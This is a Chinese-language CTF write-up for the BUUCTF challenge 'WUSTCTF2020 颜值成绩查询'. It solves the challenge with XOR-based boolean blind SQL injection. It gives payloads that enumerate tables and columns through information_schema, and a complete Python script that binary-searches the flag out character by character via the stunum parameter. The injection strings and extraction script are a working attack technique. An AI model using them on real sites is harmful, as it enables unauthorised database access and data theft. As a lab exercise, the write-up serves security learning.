BUUCTF-WEB 【WUSTCTF2020】颜值成绩查询 1

考点:异或注入

打开

image-20210422185451433

测试

1^1^1 正常

1^0^1 错误

构造payload

# 查表
1^(ord(substr((select(group_concat(table_name))from(information_schema.tables)where(table_schema=database())), 1,1))>0)^1

# 查列
1^(ord(substr((select(group_concat(column_name))from(information_schema.columns)where(table_name='flag')), 1,1))>0)^1

# 查数据
1^(ord(substr((select(group_concat(flag,value))from(flag)), 1,1))>0)^1

表名

[+] flag,score

列名

[+] flag,value

上脚本

import requests
import time


def payload(url, i, mid):
    """Probe one character of ``value`` through the boolean XOR oracle.

    Two requests are issued.  The first asks whether the character at
    position ``i`` (1-based, as MySQL ``substr`` counts) has an ordinal
    ``>= mid``; only when that holds is a second request sent asking
    whether it is exactly ``mid``.  The oracle signal is the presence of
    the word ``"admin"`` in the response body.

    Returns one of three marker values consumed by ``exp`` (they are not
    HTTP status codes): 200 when the ordinal equals ``mid``, 203 when it
    is strictly greater than ``mid``, 400 when it is smaller.

    The condition is appended verbatim to the query string, which only
    works because the server interpolates the ``stunum`` value into its
    SQL; a prepared statement or a strict integer cast on that parameter
    would remove the oracle entirely.
    """
    ge_query = "1^(ord(substr((select(group_concat(value))from(flag)), %d,1))>=%s)^1" % (i, mid)
    print(ge_query)
    first = requests.get(url + ge_query)
    if "admin" not in first.text:
        # Oracle false: the true ordinal lies below ``mid``.
        return 400
    eq_query = "1^(ord(substr((select(group_concat(value))from(flag)), %d,1))=%s)^1" % (i, mid)
    # The original only pauses before the confirmation request, not before
    # the first probe; keep that asymmetry.
    time.sleep(1)
    print(eq_query)
    second = requests.get(url + eq_query)
    # Exact hit, otherwise the ordinal is strictly greater than ``mid``.
    return 200 if "admin" in second.text else 203


def exp(url):
    """Recover the ``value`` column one character at a time.

    For every position 1..299 a binary search over ordinals 33..127 is
    driven by the three-way answer of ``payload``: 200 appends ``chr(mid)``
    and stops the search, 203 raises the lower bound, 400 lowers the upper
    bound.  Positions beyond the end of the string never answer 200, so
    their searches just exhaust the interval; nothing stops the outer loop
    early.  The string recovered so far is printed after each position.
    """
    recovered = ""
    for position in range(1, 300):
        low, high = 33, 127
        while low <= high:
            guess = (low + high) // 2
            verdict = payload(url, position, guess)
            print("[*] 返回码:" + str(verdict))
            if verdict == 200:
                # Character found for this position.
                print("[+] mid = " + str(guess))
                recovered += chr(guess)
                break
            if verdict == 203:
                # True ordinal is above the guess.
                low = guess + 1
            elif verdict == 400:
                # True ordinal is below the guess.
                high = guess - 1
        # NOTE(review): the original listing's indentation was flattened, so
        # whether this progress print sits inside the per-position loop or
        # after it cannot be read off the page; it is placed inside here
        # (the usual shape for such a script) — confirm against the source.
        print("[+] " + recovered)


if __name__ == '__main__':
    # Base URL of the challenge instance; the oracle expression is appended
    # directly to the ``stunum`` query parameter.
    target = "http://2881a64e-02bf-4c71-b948-26b1a1e6c0ae.node3.buuoj.cn/?stunum="
    exp(target)

image-20210422201033950